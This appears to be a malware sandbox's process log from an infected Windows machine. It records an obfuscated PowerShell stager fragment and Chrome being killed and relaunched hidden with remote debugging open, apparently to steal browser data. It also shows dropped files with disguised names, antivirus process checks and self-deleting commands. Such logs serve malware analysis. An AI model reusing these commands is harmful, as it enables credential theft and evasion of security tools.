''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+''+'t'+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\275919514.exe

C:\Users\Admin\AppData\Local\Temp\275919514.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5772 -ip 5772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1312

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Users\Admin\Desktop\Files\2.exe

"C:\Users\Admin\Desktop\Files\2.exe"

C:\Users\Admin\Desktop\Files\t.exe

"C:\Users\Admin\Desktop\Files\t.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5908 -ip 5908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 444

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe

"C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

